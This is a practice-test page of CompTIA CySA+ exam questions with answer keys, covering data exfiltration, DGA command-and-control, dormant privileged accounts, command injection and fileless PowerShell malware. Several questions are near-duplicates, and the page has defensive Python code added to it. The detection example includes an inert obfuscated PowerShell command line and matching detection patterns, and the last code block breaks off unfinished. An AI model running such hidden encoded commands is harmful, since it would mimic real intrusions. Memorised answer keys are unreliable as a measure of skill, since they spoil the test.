CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 6 Q101-120
Question 101
A SOC analyst observes multiple endpoints sending large amounts of outbound email with unusual attachments to unknown external domains. Which of the following is the FIRST action the analyst should take?
A) Isolate the affected endpoints to stop data exfiltration
B) Implement stricter email spam filtering rules
C) Notify all users about phishing awareness
D) Block outbound SMTP traffic globally
Answer A
Explanation:
A Isolate the affected endpoints to stop data exfiltration
The scenario indicates active data exfiltration, which may be caused by malware or a compromised internal account. The first priority in incident response is containment: stopping ongoing data loss to prevent further exposure of sensitive information. Isolating affected endpoints achieves this by disconnecting compromised systems from the network or limiting their ability to communicate with external hosts. Containment is a critical first step in the incident response lifecycle, followed by eradication, remediation, and recovery.
Isolation also preserves forensic evidence. Analysts can perform detailed investigations on the compromised systems to determine the malware variant, the scope of the compromise, and the attack vector. Preserving this evidence is crucial for root cause analysis and for meeting compliance or regulatory reporting requirements. Rapid containment reduces organizational risk by limiting potential reputational damage, financial loss, or legal liability. In addition, isolating specific systems avoids broad disruptions to legitimate business operations, unlike global measures that may affect all users.
B Implement stricter email spam filtering rules
While strengthening spam filters can prevent future phishing attempts, it does not address ongoing data exfiltration. This action is preventive and secondary to containment.
C Notify all users about phishing awareness
User education is important for long-term risk reduction but does not mitigate an active threat. Awareness campaigns are reactive and cannot stop malware that is already exfiltrating data.
D Block outbound SMTP traffic globally
Blocking all SMTP traffic could stop the exfiltration but would also disrupt legitimate business email operations, causing widespread operational impact. Targeted containment through endpoint isolation is more precise and effective.
Question 102
A network security engineer detects unusual outbound traffic from a host to an external IP over an uncommon port. The host is also initiating numerous DNS queries for randomly generated domains. Which of the following BEST describes the threat?
A) Malware using a domain generation algorithm (DGA) for command-and-control
B) A distributed denial-of-service attack
C) Standard software update traffic
D) Port scanning activity
Answer A
Explanation:
A Malware using a domain generation algorithm (DGA) for command-and-control
The combination of uncommon outbound connections and frequent DNS queries for randomized domains is indicative of malware using a domain generation algorithm (DGA) for command-and-control (C2) communications. DGAs allow malware to generate numerous pseudo-random domain names dynamically. Attackers leverage this to avoid detection and blocking by traditional domain blacklists. This technique ensures that compromised hosts maintain communication with the C2 infrastructure even if some domains are taken offline or blocked.
Detection of DGA activity involves monitoring DNS query patterns for anomalies. Indicators of compromise include unusually high query volumes, high entropy in domain names, and connections to domains with limited or no historical resolution. Network traffic analysis and endpoint telemetry complement DNS monitoring, helping to identify the infected hosts and the malware variant. Remediation involves isolating affected hosts, blocking malicious domains or IPs, removing malware, and performing forensic analysis. Threat intelligence feeds can aid in identifying known C2 servers or DGA patterns.
B A distributed denial-of-service attack
DDoS attacks aim to overwhelm services with high-volume traffic, whereas this scenario describes covert C2 communication and DNS-based obfuscation rather than volumetric attacks.
C Standard software update traffic
Legitimate updates connect to known servers using predictable ports and do not involve randomized DNS queries.
D Port scanning activity
Port scanning involves probing network ports for open services and does not generate randomized DNS requests or establish covert outbound connections.
Question 103
An analyst identifies that multiple service accounts have not been used for over six months but still possess administrative privileges. Which of the following controls would MOST effectively mitigate the associated risk?
A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable external SSH connections
D) Deploy full disk encryption on all endpoints
Answer A
Explanation:
A Implement automated account deprovisioning
Inactive service accounts with administrative privileges present a high-risk scenario. Even if unused, these accounts remain potential attack vectors. Attackers can exploit dormant accounts through stolen credentials, lateral movement, or brute-force attacks. Automated account deprovisioning ensures accounts are disabled or removed after a defined period of inactivity, enforcing the principle of least privilege.
Integration with identity governance and privileged access management (PAM) systems enhances effectiveness. Automation ensures consistency, reduces human error, and generates logs for compliance with regulatory standards such as HIPAA, PCI DSS, and GDPR. Deprovisioning also reduces the attack surface by eliminating dormant accounts that could be used for post-compromise persistence.
Complementary strategies include multi-factor authentication (MFA), monitoring for unauthorized login attempts, and periodic reviews of account activity. Automated deprovisioning enables proactive management and reduces reliance on reactive measures, such as responding after an account is compromised. Overall, this control strengthens organizational security while streamlining administrative processes and maintaining compliance.
B Increase password complexity requirements for service accounts
Password complexity improves resistance against guessing attacks but does not address the risk of dormant accounts being misused.
C Disable external SSH connections
Restricting SSH mitigates external threats but does not address internal abuse of inactive accounts.
D Deploy full disk encryption on all endpoints
Full disk encryption protects data at rest but does not reduce risks associated with privileged accounts.
Question 104
During a penetration test, testers exploit a web application vulnerability that allows OS-level command execution via unsanitized input parameters. Which of the following controls would BEST prevent this type of attack?
A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values for web applications
D) Add additional firewall rules at the perimeter
Answer A
Explanation:
A Server-side input validation with parameterized commands
Command injection vulnerabilities occur when user input is executed as part of operating system commands without proper validation or sanitization. Server-side input validation ensures that only expected input patterns, types, and lengths are accepted. Parameterized commands or prepared statements separate input data from executable code, preventing attackers from injecting malicious commands.
Secure coding practices, including input validation, output encoding, and using frameworks that enforce secure handling of user input, are crucial for reducing application-layer vulnerabilities. Static and dynamic application security testing (SAST/DAST) during development helps detect these vulnerabilities early. Web application firewalls (WAFs) can provide an additional layer of protection by filtering malicious requests and blocking known attack patterns.
Behavioral monitoring, logging, and alerting for anomalous input or execution attempts allow early detection of attacks. Remediation includes patching the vulnerable application, reviewing and updating coding standards, and educating developers on secure coding practices. Combining these measures provides a multi-layered defense to prevent command injection, protect sensitive data, maintain system integrity, and comply with frameworks such as PCI DSS or OWASP ASVS.
B Enforce TLS encryption for all web traffic
TLS secures communications in transit but does not mitigate application-layer command injection vulnerabilities.
C Increase session timeout values for web applications
Adjusting session timeouts mitigates session hijacking risks but does not prevent command injection.
D Add additional firewall rules at the perimeter
Firewalls cannot inspect application input and cannot prevent execution of malicious commands from the application layer.
Question 105
A SOC analyst detects that a server has been compromised and a reverse shell has been established using stolen administrative credentials. Which of the following controls would MOST effectively prevent similar attacks in the future?
A) Implement privileged access management (PAM) with just-in-time (JIT) access
B) Increase password complexity for all accounts
C) Deploy signature-based antivirus on the server
D) Disable all remote access capabilities
Answer A
Explanation:
A Implement privileged access management (PAM) with just-in-time (JIT) access
Privileged Access Management with JIT access is a proactive control that minimizes the risk of credential misuse. JIT access grants administrative privileges only for the duration necessary to complete specific tasks, reducing the opportunity for attackers to use stolen credentials to establish reverse shells, move laterally, or maintain persistence. PAM systems provide detailed logging, session monitoring, and auditing, enabling real-time detection of suspicious behavior and supporting forensic investigations.
This approach enforces the principle of least privilege by ensuring users only gain elevated access when required. Integration with multi-factor authentication (MFA) and endpoint monitoring further enhances protection. PAM supports compliance with regulatory standards such as SOX, HIPAA, and PCI DSS, providing auditable records for privileged access. Organizations can also combine PAM with anomaly detection and threat intelligence to detect and respond to unusual access patterns promptly.
B Increase password complexity for all accounts
Strong passwords mitigate brute-force attacks but cannot prevent abuse of already compromised credentials.
C Deploy signature-based antivirus on the server
Traditional antivirus may detect known malware but cannot prevent reverse shells established via legitimate administrative tools.
D Disable all remote access capabilities
Disabling all remote access could disrupt legitimate administrative operations, whereas PAM with JIT provides controlled, secure access without operational disruption.
Question 106
A SOC analyst notices multiple endpoints attempting to connect to suspicious external IP addresses over high-numbered ports. DNS logs indicate a large number of queries to seemingly random domains. Which of the following BEST describes the threat?
A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Standard software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system
Answer A
Explanation:
A Malware using a domain generation algorithm (DGA) for command-and-control
The scenario indicates malware activity using a domain generation algorithm (DGA). DGAs allow malware to generate numerous pseudo-random domain names dynamically, enabling command-and-control (C2) communications while evading detection through static domain blacklists. The combination of connections over uncommon high-numbered ports and high-frequency DNS queries to seemingly random domains is a hallmark of DGA activity.
Detection requires a combination of behavioral monitoring and analytics. Analysts should evaluate DNS logs for high entropy, random or non-existent domains, and unusual query frequencies. Network traffic analysis complements DNS monitoring, identifying endpoints that exhibit abnormal connection patterns or attempt communication outside standard business operations. Endpoint detection and response (EDR) telemetry can reveal suspicious process executions, memory-resident malware, or scripts initiating these connections.
Mitigation involves isolating affected endpoints, blocking identified malicious domains or IP addresses, and conducting malware removal and forensic analysis. Advanced strategies may include reverse engineering the DGA to predict future domain generation and preemptively blocking potential C2 channels. Threat intelligence feeds provide additional context on known DGA-based malware campaigns. Implementing defense-in-depth—behavioral monitoring, network segmentation, EDR, and threat intelligence—ensures timely detection and containment.
B Standard software update traffic
Legitimate update traffic uses known servers and standard ports. Randomized DNS queries are inconsistent with software update behavior.
C Distributed denial-of-service (DDoS) attack
DDoS attacks involve overwhelming resources to disrupt service and do not typically produce random DNS queries or covert outbound connections.
D Misconfigured internal monitoring system
Misconfigurations may generate unusual traffic, but the combination of external IP connections and high-frequency random DNS queries strongly suggests malicious activity rather than operational misconfiguration.
Question 107
An internal audit reveals that several privileged service accounts have not been used for more than six months but retain administrative access. Which of the following controls would MOST effectively mitigate this risk?
A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints
Answer A
Explanation:
A Implement automated account deprovisioning
Inactive privileged accounts are high-risk because they provide potential avenues for attackers to gain unauthorized access. Automated account deprovisioning removes or disables dormant accounts after a defined period of inactivity, reducing the attack surface. This process enforces the principle of least privilege, ensuring only active users maintain administrative access.
Integration with identity governance and privileged access management (PAM) systems ensures consistent application of deprovisioning policies and generates logs for auditing and compliance. Automated deprovisioning reduces reliance on manual reviews, minimizing human error. Combined with multi-factor authentication (MFA), monitoring, and anomaly detection, deprovisioning strengthens security posture by mitigating the risk of lateral movement and unauthorized access via dormant accounts.
Deprovisioned accounts should be monitored for reactivation attempts and for any unauthorized access. By systematically removing dormant privileges, organizations improve operational security and meet compliance requirements for regulatory standards such as HIPAA, PCI DSS, and SOX. Complementary practices include periodic access reviews, monitoring account activity, and enforcing strict access policies to minimize insider threats.
B Increase password complexity for service accounts
While strong passwords reduce brute-force risk, they do not eliminate threats posed by dormant accounts with administrative privileges.
C Disable all external SSH access
SSH restrictions limit remote access but do not address risks from internally compromised or dormant accounts.
D Deploy full disk encryption on endpoints
Encryption protects data at rest but does not reduce the risk associated with dormant administrative accounts.
Question 108
During a penetration test, testers exploit a web application vulnerability that allows OS-level command execution through unsanitized input fields. Which of the following controls would BEST prevent this type of attack?
A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter
Answer A
Explanation:
A Server-side input validation with parameterized commands
Command injection occurs when applications improperly process user input, allowing execution of arbitrary operating system commands. Server-side input validation ensures that all inputs meet expected formats, types, and lengths, preventing malicious commands from being executed. Parameterized commands or prepared statements separate data from executable code, effectively neutralizing injection attempts.
Secure coding practices, including input validation, output encoding, and the use of secure frameworks, reduce application-layer vulnerabilities. Regular static and dynamic security testing (SAST/DAST) during development helps identify vulnerabilities before deployment. Web application firewalls (WAFs) add an extra layer of protection by filtering malicious requests.
Monitoring and logging suspicious input attempts provide early warnings of potential attacks. Remediation includes patching vulnerable code, implementing secure coding standards, and educating developers on best practices. Together, these measures protect system integrity and sensitive data, and support compliance with security frameworks such as PCI DSS and OWASP ASVS.
B Enforce TLS encryption for all web traffic
TLS encrypts communications but does not mitigate input validation vulnerabilities or command injection risks.
C Increase session timeout values
Session timeouts improve protection against session hijacking but do not address command injection.
D Add additional firewall rules at the perimeter
Firewalls cannot inspect application input and therefore cannot prevent OS-level command execution.
Question 109
A SOC analyst discovers that a server has been compromised and a reverse shell has been established using stolen administrative credentials. Which of the following controls would MOST effectively prevent similar attacks in the future?
A) Implement privileged access management (PAM) with just-in-time (JIT) access
B) Increase password complexity for all accounts
C) Deploy signature-based antivirus on the server
D) Disable all remote access capabilities
Answer A
Explanation:
A Implement privileged access management (PAM) with just-in-time (JIT) access
PAM with JIT access reduces the risk of attacks leveraging stolen credentials by granting administrative privileges only when needed and for limited time periods. By limiting persistent access, JIT prevents attackers from maintaining reverse shells or conducting lateral movement. PAM provides logging, monitoring, and auditing for privileged sessions, allowing real-time detection of anomalous activity.
JIT access enforces least privilege principles while allowing legitimate operations to continue. Multi-factor authentication (MFA) combined with PAM enhances security, and integration with EDR and SIEM solutions enables correlation of access activity with network or system anomalies. This proactive approach prevents attackers from exploiting compromised credentials while maintaining operational efficiency.
B Increase password complexity for all accounts
Strong passwords help resist brute-force attacks but do not prevent attacks using already compromised credentials.
C Deploy signature-based antivirus on the server
Antivirus may detect known malware but is ineffective against reverse shells established through legitimate administrative tools.
D Disable all remote access capabilities
Disabling remote access entirely can disrupt legitimate business functions. PAM with JIT access provides secure, controlled access without operational disruption.
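The JIT mechanism that Questions 105 and 109 rely on (privileges that exist only as time-boxed, ticketed, auditable grants) as an added example; this is illustrative code written for this page, not any PAM product's API, and the broker class, the "server-admin" role, the CHG- ticket format and the reference clock T0 are all constructed for it.

```python
import uuid
from datetime import datetime, timedelta
from typing import Optional

# Constructed reference clock for the example; at(m) is m minutes after T0.
T0 = datetime(2024, 5, 1, 9, 0)


def at(minutes: int) -> datetime:
    return T0 + timedelta(minutes=minutes)


class JitBroker:
    """Minimal just-in-time elevation broker (illustrative, not a product):
    privileges exist only as time-boxed grants tied to a change ticket, every
    decision is written to an audit trail, and a grant can be revoked the
    moment a session looks wrong."""

    def __init__(self, max_minutes: int = 60):
        self.max_minutes = max_minutes
        self.grants = {}      # grant_id -> grant record
        self.audit = []       # append-only log of every decision

    def _log(self, event: str, now: datetime, **fields):
        self.audit.append({"event": event, "time": now.isoformat(), **fields})

    def request_elevation(self, user: str, role: str, ticket: str,
                          minutes: int, now: datetime) -> Optional[str]:
        """Issue a grant, or return None (with a logged reason) when the
        request breaks policy: no ticket, or a window longer than the cap."""
        if not ticket:
            self._log("deny", now, user=user, role=role, reason="missing ticket")
            return None
        if minutes <= 0 or minutes > self.max_minutes:
            self._log("deny", now, user=user, role=role,
                      reason=f"duration {minutes}m outside 1..{self.max_minutes}m")
            return None
        grant_id = str(uuid.uuid4())
        self.grants[grant_id] = {
            "user": user, "role": role, "ticket": ticket,
            "start": now, "end": now + timedelta(minutes=minutes), "revoked": False,
        }
        self._log("grant", now, grant=grant_id, user=user, role=role,
                  ticket=ticket, minutes=minutes)
        return grant_id

    def is_authorized(self, user: str, role: str, at_time: datetime) -> bool:
        """True only while an unrevoked grant for this user and role covers
        the moment at_time. An expired grant is as good as absent, which is
        what denies a stolen credential any standing access."""
        for g in self.grants.values():
            if (g["user"] == user and g["role"] == role and not g["revoked"]
                    and g["start"] <= at_time < g["end"]):
                return True
        self._log("deny", at_time, user=user, role=role, reason="no active grant")
        return False

    def revoke(self, grant_id: str, reason: str, now: datetime) -> bool:
        """Cut a grant short, e.g. when session monitoring flags the user."""
        g = self.grants.get(grant_id)
        if g is None or g["revoked"]:
            return False
        g["revoked"] = True
        g["end"] = min(g["end"], now)
        self._log("revoke", now, grant=grant_id, user=g["user"],
                  role=g["role"], reason=reason)
        return True

    def active_grants(self, at_time: datetime) -> list:
        """What an analyst reviews: who holds elevated access right now."""
        return sorted((g["user"], g["role"]) for g in self.grants.values()
                      if not g["revoked"] and g["start"] <= at_time < g["end"])


if __name__ == "__main__":
    broker = JitBroker()
    gid = broker.request_elevation("alice", "server-admin", "CHG-1234", 30, now=at(0))
    print("authorized at +29m:", broker.is_authorized("alice", "server-admin", at(29)))
    print("authorized at +31m:", broker.is_authorized("alice", "server-admin", at(31)))
    for entry in broker.audit:
        print(entry)
```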
Question 110
A security analyst observes abnormal PowerShell execution on multiple endpoints. Scripts are obfuscated and communicate with unknown external IP addresses. Antivirus scans do not detect any malicious files. Which of the following BEST describes the threat?
A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack
Answer A
Explanation:
A Fileless malware leveraging living-off-the-land techniques
Fileless malware resides primarily in memory and uses legitimate system tools, such as PowerShell, WMI, or Office macros, to execute malicious actions. The described scenario—obfuscated scripts communicating with unknown IP addresses—indicates living-off-the-land (LotL) techniques. LotL attacks minimize artifacts on disk, making detection by signature-based antivirus difficult.
Indicators include abnormal script execution, unexpected process spawning, unusual network connections, and deviations from baseline behavior. Detection requires behavioral monitoring, EDR telemetry, and memory forensics. Mitigation includes isolating affected endpoints, terminating malicious processes, analyzing scripts for malicious activity, and remediating systems. Preventive strategies include application whitelisting, least privilege enforcement, PowerShell logging (module logging, script block logging, transcription), and restricting execution policies.
Network segmentation and threat intelligence integration help identify and block communications with malicious IP addresses. Fileless malware is challenging because it exploits legitimate tools to blend in with normal activity, making defense-in-depth essential. Response procedures must include containment, forensic analysis, and remediation planning. Employee training, anomaly detection, and continuous monitoring further reduce exposure to LotL threats.
B Standard ransomware encrypting files
Ransomware typically encrypts files and displays a ransom note, unlike memory-resident malicious scripts.
C Phishing emails delivering malicious attachments
Phishing may deliver malware initially, but the scenario indicates active post-compromise fileless execution.
D Distributed denial-of-service (DDoS) attack
DDoS attacks target availability and do not involve obfuscated scripts or memory-resident malicious execution.
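The indicators listed for Question 110 (abnormal script execution, unexpected process spawning, unusual network connections) turned into scoring logic over process telemetry, as an added example that is not part of the original page. The event shape, the rule weights, the threshold and all sample values (hosts, paths, command lines; 203.0.113.0/24 is a documentation range) are constructed for this illustration, not real indicators.

```python
import re

# Constructed process-creation telemetry in the shape an EDR might export
# (parent image, child image, command line, outbound destination). All
# values are invented for this example. The "-enc" payload is base64 of
# zero bytes, i.e. inert.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1", "dst": None},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc AAAAAAAAAAAAAAAAAAAAAAAA",
     "dst": "203.0.113.7:18080"},
    {"parent": "services.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\agent\inventory.ps1",
     "dst": "10.0.0.5:443"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
COMMON_PORTS = {53, 80, 443}
IPV4_RE = re.compile(r"^(\d{1,3}\.){3}\d{1,3}$")

# Weighted indicators: none is conclusive on its own (admins use these
# switches too); together they describe the LotL chain in the question,
# an office app spawning obfuscated PowerShell that talks to an unknown host.
RULES = [
    ("encoded_command", 2, re.compile(r"(?i)\s-(e|ec|en|enc|encodedcommand)\b")),
    ("hidden_window", 1, re.compile(r"(?i)\s-w(indowstyle)?\s+hidden\b")),
    ("execution_policy_bypass", 1, re.compile(r"(?i)\s-ex(ecutionpolicy)?\s+bypass\b")),
]


def _is_powershell(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in {"powershell.exe", "pwsh.exe"}


def _ip_literal_uncommon_port(dst) -> bool:
    """True for a raw IPv4 literal on a port outside the usual web/DNS set;
    legitimate update traffic normally goes to a hostname on 80/443."""
    if not dst or ":" not in dst:
        return False
    host, port = dst.rsplit(":", 1)
    return bool(IPV4_RE.match(host)) and port.isdigit() and int(port) not in COMMON_PORTS


def score_event(ev: dict):
    """Return (score, indicator names) for one process-creation event."""
    if not _is_powershell(ev["image"]):
        return 0, []
    score, hits = 0, []
    if ev["parent"].lower() in OFFICE_PARENTS:
        score, hits = score + 3, hits + ["office_parent_spawns_powershell"]
    for name, weight, pattern in RULES:
        if pattern.search(ev["cmdline"]):
            score, hits = score + weight, hits + [name]
    if _ip_literal_uncommon_port(ev["dst"]):
        score, hits = score + 2, hits + ["ip_literal_uncommon_port"]
    return score, hits


def triage(events: list, threshold: int = 4) -> list:
    """Indices of events whose combined score crosses the alert threshold;
    a single switch such as -ExecutionPolicy Bypass stays below it."""
    return [i for i, ev in enumerate(events) if score_event(ev)[0] >= threshold]


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, score_event(ev))
    print("alert on events:", triage(SAMPLE_EVENTS))
```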
Question 111
A SOC analyst identifies multiple endpoints sending large amounts of outbound email with unusual attachments to unknown external domains. Which of the following should be the FIRST action the analyst takes?
A) Isolate the affected endpoints to stop data exfiltration
B) Implement stricter email spam filtering rules
C) Notify all users about phishing awareness
D) Block outbound SMTP traffic globally
Answer A
Explanation:
A Isolate the affected endpoints to stop data exfiltration
The primary concern in this scenario is ongoing data exfiltration, potentially caused by malware, compromised credentials, or malicious insiders. Immediate containment is the first step in incident response because it prevents further loss of sensitive data and preserves the integrity of affected systems. Isolating compromised endpoints can involve disconnecting them from the network, blocking certain outbound traffic, or placing them in a quarantined VLAN to stop the exfiltration while allowing controlled investigation.
Containment serves several purposes: it halts the spread of malware, prevents additional data from leaving the organization, and allows forensic investigation. Analysts can capture volatile memory, logs, and other evidence without risk of contamination or destruction by active malicious processes. This evidence is critical for understanding attack vectors, tactics, techniques, and procedures (TTPs) used by the attacker.
During containment, careful communication is essential to avoid panic and maintain operational continuity. Analysts must coordinate with IT teams to ensure critical business functions are maintained while compromised endpoints are isolated. Containment also provides time to prepare remediation steps, including malware eradication, credential resets, system restoration, and user notifications.
Failing to isolate endpoints immediately can result in significant operational, financial, and reputational damage. Attackers could exfiltrate sensitive customer data, intellectual property, or confidential financial information. Isolation is a surgical, targeted measure that stops the threat at its source without impacting the broader user base, unlike broad network-wide measures.
B Implement stricter email spam filtering rules
While strengthening spam filters reduces the likelihood of future phishing attempts or malicious emails, it does not address the current exfiltration. This is a preventive control, secondary to immediate containment.
C Notify all users about phishing awareness
User education is essential for long-term security posture improvement, but it does not mitigate active threats. Notifications are reactive and insufficient when malicious activity is already in progress.
D Block outbound SMTP traffic globally
While blocking all outbound SMTP traffic may prevent exfiltration via email, it disrupts legitimate communications across the organization, impacting critical business operations. Isolation of specific endpoints is more precise and operationally efficient.
Question 112
A network security engineer detects unusual outbound traffic from a host to an external IP over an uncommon port. DNS logs show numerous queries to randomly generated domains. Which of the following BEST describes the threat?
A) Malware using a domain generation algorithm (DGA) for command-and-control
B) A distributed denial-of-service attack
C) Standard software update traffic
D) Port scanning activity
Answer A
Explanation:
A Malware using a domain generation algorithm (DGA) for command-and-control
The observed behavior strongly suggests the presence of malware utilizing a domain generation algorithm (DGA) to maintain covert command-and-control (C2) communication. DGAs dynamically generate pseudo-random domain names at regular intervals, allowing malware to contact its C2 infrastructure while evading static blacklists and traditional detection methods. The combination of unusual outbound connections and high-frequency DNS queries to random or high-entropy domains is characteristic of this threat.
Detecting DGA activity requires a multi-faceted approach. DNS logs should be analyzed for patterns indicative of high entropy, randomization, or domains with short lifetimes. Endpoint monitoring and network traffic analysis complement DNS monitoring by highlighting anomalous communication patterns, suspicious processes, or abnormal connections outside expected geolocations or protocols. Behavioral indicators, such as automated scripts, unusual processes, and memory-resident malware, often accompany DGA activity.
Mitigation involves isolating infected endpoints, blocking malicious domains and IP addresses, and removing the malware from compromised hosts. Threat intelligence feeds provide additional context for known DGA patterns and associated malware families. Reverse engineering DGAs can allow security teams to predict future domain generation, proactively blocking communication attempts before the malware successfully contacts its C2 infrastructure.
A layered defense strategy, including endpoint detection and response (EDR), network segmentation, anomaly detection, application whitelisting, and behavior-based analytics, ensures the organization can detect and respond to sophisticated malware campaigns promptly. Analysts should also implement continuous monitoring to detect new infections and prevent lateral movement. Forensic analysis post-containment can identify compromised accounts, assess the scope of the attack, and guide improvements to network and endpoint defenses.
B A distributed denial-of-service attack
DDoS attacks aim to overwhelm resources, causing service degradation or outages. The observed behavior involves covert, targeted communications rather than volumetric traffic, distinguishing it from DDoS activity.
C Standard software update traffic
Legitimate update processes use predictable, known servers and standard ports. Randomized DNS queries and connections over uncommon ports indicate malicious activity, not routine updates.
D Port scanning activity
Port scans involve probing IP addresses to identify open services. They do not generate high-frequency randomized DNS queries or maintain persistent communication channels with external C2 servers.
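The DNS-side detection described in Questions 102, 106 and 112 (high query volume, high-entropy names, lookups that mostly fail) as an added example that is not from the original page. The log format, the thresholds, the client addresses and the query names are all constructed for this illustration; a production detector would add a public-suffix list and a per-host baseline.

```python
import math
from collections import defaultdict

# Constructed sample resolver log, one query per line:
#   <timestamp> <client_ip> <queried_name> <rcode>
# Hosts, names and the format itself are invented for this example.
SAMPLE_DNS_LOG = """\
2024-05-01T10:00:01Z 10.0.0.15 www.example.com NOERROR
2024-05-01T10:00:02Z 10.0.0.15 mail.example.com NOERROR
2024-05-01T10:00:03Z 10.0.0.42 xk3q9vz7lpd1.net NXDOMAIN
2024-05-01T10:00:03Z 10.0.0.42 q8zr2ymw0bhx.com NXDOMAIN
2024-05-01T10:00:04Z 10.0.0.42 t5vn1kjd8p3c.org NXDOMAIN
2024-05-01T10:00:04Z 10.0.0.42 zw7m4xq2rbhs.net NXDOMAIN
2024-05-01T10:00:05Z 10.0.0.42 nb9y3vk6pqxz.com NXDOMAIN
2024-05-01T10:00:05Z 10.0.0.42 update.example.com NOERROR
2024-05-01T10:00:06Z 10.0.0.15 cdn.example.net NOERROR
"""


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; random-looking labels score high."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_label(qname: str) -> str:
    """Label directly left of the TLD, e.g. 'example' for mail.example.com.
    Naive on purpose: a public-suffix list would handle co.uk-style TLDs."""
    parts = qname.rstrip(".").lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def is_suspicious_label(label: str) -> bool:
    """Long, high-entropy and vowel-poor: typical of DGA output, rare in
    human-chosen names (the vowel check keeps e.g. 'microsoftonline' out)."""
    if len(label) < 10:
        return False
    vowels = sum(label.count(v) for v in "aeiou")
    return shannon_entropy(label) >= 3.0 and vowels / len(label) <= 0.3


def analyze_dns_log(log_text: str, min_suspicious: int = 3,
                    min_nx_ratio: float = 0.5) -> dict:
    """Per-client counts. A client is flagged when it issues several
    random-looking queries and most of its lookups fail (NXDOMAIN), which is
    what a DGA sweeping through unregistered candidate domains looks like."""
    stats = defaultdict(lambda: {"queries": 0, "suspicious": 0, "nxdomain": 0})
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip blank or malformed lines
        _ts, client, qname, rcode = fields
        s = stats[client]
        s["queries"] += 1
        s["suspicious"] += int(is_suspicious_label(registrable_label(qname)))
        s["nxdomain"] += int(rcode.upper() == "NXDOMAIN")
    for s in stats.values():
        nx_ratio = s["nxdomain"] / s["queries"]
        s["flagged"] = s["suspicious"] >= min_suspicious and nx_ratio >= min_nx_ratio
    return dict(stats)


def flagged_clients(log_text: str) -> list:
    """Sorted list of client addresses worth isolating and investigating."""
    return sorted(c for c, s in analyze_dns_log(log_text).items() if s["flagged"])


if __name__ == "__main__":
    for client, s in analyze_dns_log(SAMPLE_DNS_LOG).items():
        print(client, s)
    print("flagged:", flagged_clients(SAMPLE_DNS_LOG))
```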
Question 113
An analyst identifies multiple service accounts that have not been used for over six months but still possess administrative privileges. Which of the following controls would MOST effectively mitigate the associated risk?
A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable external SSH connections
D) Deploy full disk encryption on all endpoints
Answer A
Explanation:
A Implement automated account deprovisioning
Dormant privileged accounts present a significant risk to organizational security. Attackers often target such accounts because they are less likely to be monitored and can provide an entry point for lateral movement or post-compromise persistence. Automated account deprovisioning removes or disables accounts after a defined inactivity period, reducing attack surfaces while enforcing the principle of least privilege.
Integration with identity governance and privileged access management (PAM) systems ensures that deprovisioning policies are applied consistently and that audit logs are generated for regulatory compliance, including HIPAA, PCI DSS, and SOX. Automation minimizes human error, ensuring that no dormant accounts remain active inadvertently. Periodic verification and reporting also allow security teams to maintain visibility over account activity and enforce proactive security practices.
Complementary measures include multi-factor authentication (MFA), continuous monitoring for unauthorized login attempts, and anomaly detection. Automated deprovisioning also supports operational efficiency, enabling administrators to manage large-scale environments with minimal manual intervention while maintaining security. By removing dormant accounts, organizations reduce the likelihood of credential-based attacks, insider threats, and potential regulatory violations.
B Increase password complexity requirements for service accounts
While strong passwords reduce susceptibility to brute-force attacks, they do not mitigate risks associated with inactive accounts that retain administrative privileges.
C Disable external SSH connections
Restricting SSH limits external access but does not address threats from dormant accounts or internal misuse.
D Deploy full disk encryption on all endpoints
Encryption protects data at rest but does not reduce risks posed by dormant administrative accounts.
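The deprovisioning policy from Questions 103, 107 and 113 (disable after a defined inactivity period, privileged accounts first, with an auditable record of each decision) as an added example that is not from the original page. The account records, group names, the 180-day window and the AS_OF date are constructed; the two edge cases a practitioner has to decide on, accounts that have never logged on and documented break-glass accounts, are handled explicitly.

```python
from dataclasses import dataclass, field
from datetime import date
from typing import Optional

PRIVILEGED_GROUPS = {"Domain Admins", "Server Admins", "sudo"}   # assumed names
AS_OF = date(2024, 5, 1)                                          # constructed review date


@dataclass
class Account:
    name: str
    created: date
    last_logon: Optional[date]          # None = never logged on
    groups: list = field(default_factory=list)
    enabled: bool = True
    exempt: bool = False                # e.g. a documented break-glass account

    @property
    def privileged(self) -> bool:
        return any(g in PRIVILEGED_GROUPS for g in self.groups)


# Constructed directory export; names and dates are invented.
SAMPLE_ACCOUNTS = [
    Account("svc_backup", date(2022, 3, 1), date(2023, 10, 1), ["Domain Admins"]),
    Account("svc_etl", date(2022, 3, 1), date(2024, 4, 20), ["Server Admins"]),
    Account("svc_legacy", date(2023, 6, 15), None, ["Domain Admins"]),
    Account("breakglass_admin", date(2021, 1, 1), date(2023, 1, 1), ["Domain Admins"], exempt=True),
    Account("jdoe", date(2022, 3, 1), date(2023, 9, 1), ["Users"]),
    Account("svc_old", date(2020, 1, 1), date(2021, 1, 1), ["Domain Admins"], enabled=False),
]


def inactive_days(acct: Account, as_of: date) -> int:
    """Days since last logon. An account that never logged on is measured
    from its creation date so it cannot hide behind a missing timestamp."""
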